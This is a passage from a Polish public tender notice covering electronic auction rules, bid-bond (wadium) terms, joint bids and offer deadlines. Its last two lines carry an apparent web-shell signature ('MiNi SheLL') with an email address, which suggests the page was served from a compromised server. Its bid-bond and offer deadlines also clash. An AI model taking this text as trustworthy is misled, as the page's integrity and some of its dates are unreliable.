oferty niepodlegające<br/>odrzuceniu,22.1.2. w toku aukcji elektronicznej stosowane będzie kryterium ofert– zgodnie z zapisami w SWZ – w toku aukcji licytowana będzie tylkocena,22.1.3. sposób ocenyofert w toku<br/>aukcji elektronicznej będzie obejmował przeliczanie postąpień na punktową ocenęoferty, z<br/>uwzględnieniem punktacji otrzymanej przed otwarciem aukcji,22.1.4. w trakcie aukcjikażdemu<br/>wykonawcy udostępniany jest: numer porządkowy przydzielony jego ofercie, aktualnapozycja w<br/>rankingu ofert, wysokość ceny najkorzystniejszej, wysokość postąpienia, którewykonawca<br/>powinien dokonać w celu złożenia najkorzystniejszej oferty przy uwzględnieniuzaoferowanych<br/>przez niego pozostałych kryteriów oceny ofert, czas pozostały do zakończeniaaukcji,22.1.5.<br/>aukcja trwa dwadzieścia minut. Złożenie co najmniej jednego postąpienia wtrakcie ostatnich 10<br/>minut aukcji wydłuża ją o 10 minut dogrywki. Złożenie co najmniej jednego postąpienia w trakcie<br/>dogrywki wydłuża czas aukcji o kolejną pięciominutową dogrywkę.Zamawiający nie wprowadza<br/>ograniczeń co do liczby dogrywek,22.1.6. gdzie postąpieniezostanie określone na poziomie nie<br/>mniejszym niż 0,1 %ceny całkowitej ceny brutto, określonejw ofercie ocenionej jako<br/>najkorzystniejsza.22.2. AdresPortalu Aukcji Publicznych, na którymbędzie prowadzona aukcja<br/>elektroniczna: https://laipsrk.coig.biz/ 22.2.1. Wymagania dotyczącerejestracji i identyfikacji<br/>Wykonawców: a) Zaproszenie do udziału w aukcji elektronicznejzawierające między innymi<br/>komplet: login i hasło (umożliwiające zalogowanie do systemuaukcyjnego), zostanie przesłane<br/>Wykonawcom za pośrednictwem Portalu Aukcji Publicznych, naadres e-mail Wykonawcy,<br/>wskazany w formularzu ofertowym.22.2.2. Zalecane wymaganiatechniczne urządzeń<br/>informatycznych użytych doudziału w aukcji elektronicznej, zapewniającestabilne współdziałanie<br/>z Portalem Aukcji Publicznych:a) Szerokopasmowe łącze internetowe,b)Komputer klasy PC z<br/>jednym z następujących systemów operacyjnych: Windows XP, WindowsVista, Windows 7,<br/>Windows 8, Windows 10 (bez wsparcia dla Windows XP);c) Stabilne wersje(bez wsparcia dla<br/>wersji beta) przeglądarki internetowej Internet Explorer w wersji od 9 do 11.Przeglądarka<br/>internetowa musi mieć włączoną obsługę JavaScript oraz zainstalowane<br/>darmoweoprogramowanie Java (JRE) –zgodnie z zaleceniami ze strony dostawcy Java,d)<br/>Ważny podpiselektroniczny zweryfikowanykwalifikowanym certyfikatem wydanym przez jedno z<br/>następującychcentr certyfikacji:• Cencert,•Krajowa Izba Rozliczeniowa S.A.,• PWPW,• Certum•<br/>EuroCert.e)Urządzenie technicznesłużące do obsługi podpisu elektronicznego weryfikowanego<br/>ważnymkwalifikowanymcertyfikatem,f) Minimalna rozdzielczość ekranu wymagana do<br/>poprawnegowyświetlania portalu to 1366x768,g) Wszelkie szczegółowe informacje dotyczące<br/>w/w warunkówWykonawca znajdzie na stronie https://laip-srk.coig.biz w dziale „Informacje<br/>podstawowe” orazinstrukcjiobsługi w dziale „Instrukcja obsługi” (dostępnej po zalogowaniu).22.3.<br/>Administrator nieponosi odpowiedzialności za nieprawidłowości wynikające z korzystania przez<br/>Uczestników zoprogramowania innego niż zalecane.22.4. Akceptacja regulaminu Portalu Aukcji<br/>Publicznychjest elementem wymaganym w trakcie pierwszego logowania oraz po każdorazowej<br/>zmianieregulaminu Portalu.22.5. Wykonawca ma możliwość zalogowania do Portalu Aukcji<br/>Publicznych,przeprowadzenia testu podpisu kwalifikowanego oraz udziału w stałej aukcji<br/>testowej odmomentu otrzymania wraz z zaproszeniem poufnego identyfikatora (komplet loginhasło).<br/>22.6.Wprzypadku, gdy Wykonawca posiada podpis elektroniczny wystawiony przez<br/>zagranicznecentrum certyfikacji, jest on zobligowany do dostarczenia Administratorowi wzoru<br/>takiegopodpisu w terminie nie krótszym niż 10 dni przed rozpoczęciem aukcji. UWAGA: WW<br/>sytuacjinie wzięcia udziału w aukcji elektronicznej wiążące pozostaną złożone oferty<br/>pisemne,którebędą podlegały automatycznej ocenie w toku aukcji elektronicznej na równi z<br/>ofertami tychWykonawców, którzy zdecydują się „poprawić” swoje oferty składając kolejne<br/>postąpienia w toku aukcji. Udział w aukcji elektronicznej nie jest obowiązkowy – z tego powodu<br/>Wykonawcy biorący udział w postępowaniu nie muszą dysponować podpisem elektronicznym (w<br/>takim przypadku pozbawiają się możliwości składania postąpień w aukcji elektronicznej ofert). <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do przetargu jest zobowiązany do wniesienia wadium na całość<br/>przedmiotu zamówienia w kwocie: 8 000,00 złotych (słownie: osiem tysięcy złotych, 00/100)16.1.<br/>Wadium jest zatrzymywane w okolicznościach wskazanych Ustawą Pzp16.2. Wadium może być wnoszone w jednej lub kilku następujących formach:16.2.1. pieniądzu;16.2.2. gwarancjach<br/>bankowych;16.2.3. gwarancjach ubezpieczeniowych;16.2.4. poręczeniach udzielanych przez<br/>podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).16.3. W<br/>przypadku, kiedy wadium jest wnoszone w pieniądzu, należy je wpłacić na następujące konto PL<br/>82 1050 1230 1000 0090 3044 6992 (z dopiskiem wadium do postępowania nr ZP-KCL-<br/>0001/21). W przypadku wadium wnoszonego w formie gwarancji bankowej lub gwarancji<br/>ubezpieczeniowej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający wymaga, aby w dokumencie gwarancji wprost wymienieni zostali wszyscy<br/>Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, których oferta jest<br/>zabezpieczana gwarancją bankową lub gwarancją ubezpieczeniową. 16.4. Wadium należy<br/>wnieść przed upływem terminu składania ofert. Wniesienie wadium w pieniądzu za pomocą<br/>przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank<br/>prowadzący rachunek zamawiającego potwierdzi, że otrzymał taki przelew przed upływem<br/>terminu składania ofert, tj. do 24.03.2021r16.5. Gwarancja lub poręcznie przedstawiane na<br/>zabezpieczenie wadium musi być złożone w oryginale (podpisane kwalifikowanym podpisem<br/>elektronicznym przez wystawiającego), udzielone wyłącznie na zasadach prawa polskiego, a<br/>spory dotyczące wadium muszą podlegać właściwości sądu polskiego i powinno spełniać<br/>poniższe wymagania:16.5.1. Wadium będzie wypłacone zamawiającemu w sytuacji, gdy<br/>wykonawca nie wywiązał się ze zobowiązań wynikających z poniższych warunków zgodnie z art.<br/>98 ust. 6 Ustawy Pzp.16.5.2. Kwota i terminy obowiązywania winny być zgodne z<br/>postanowieniami specyfikacji przetargowej. Termin obowiązywania gwarancji lub poręczenia<br/>musi obejmować cały okres związania ofertą określony w SWZ.16.5.3. Powinny być udzielone<br/>nieodwołalnie i bezwarunkowo i nie mogą być zawarte jakiekolwiek warunki ograniczające<br/>zakres odpowiedzialności wynikającej z tej czynności prawnej lub wymogi, których spełnienie<br/>przez zamawiającego warunkuje wypłatę gwarantowanej (poręczonej) kwoty.16.5.4. Jedynym<br/>warunkiem wypłacenia kwoty gwarantowanej ma być przedstawienie Gwarantowi lub<br/>Poręczającemu w terminie obowiązywania wezwania zamawiającego do wypłacenia określonej<br/>kwoty wraz z określeniem powodu utraty wadium przez wykonawcę podpisanego przez osoby<br/>upoważnione do reprezentowania zamawiającego.16.5.5. Przedstawienie gwarancji lub<br/>poręczenia niespełniających powyższych warunków uznane będzie przez zamawiającego za<br/>niewniesienie wadium, pod rygorem wykluczenia z postępowania o udzielenia zamówienia.<br/>16.5.6. W przypadku wadium wnoszonego w formie gwarancji bankowej lub gwarancji<br/>ubezpieczeniowej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający wymaga, aby w dokumencie gwarancji wprost wymienienie zostali wszyscy<br/>Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, których oferta jest<br/>zabezpieczana gwarancją bankową lub gwarancją ubezpieczeniową. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>którym mowa w pkt. 9.1.1) składa każdy z wykonawców. Oświadczenie to potwierdzi brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z pkt 26 SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej działającej pod adresem: https://efo.coig.biz poprzez ElektronicznyFormularz Ofertowy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający zaprosi do negocjacji maksymalnie pięciu Wykonawców, którzy złożyli oferty<br/>niepodlegające odrzuceniu najwyżej ocenionych wg kryterium określonego w pkt 21.

Creat By MiNi SheLL
Email: jattceo@gmail.com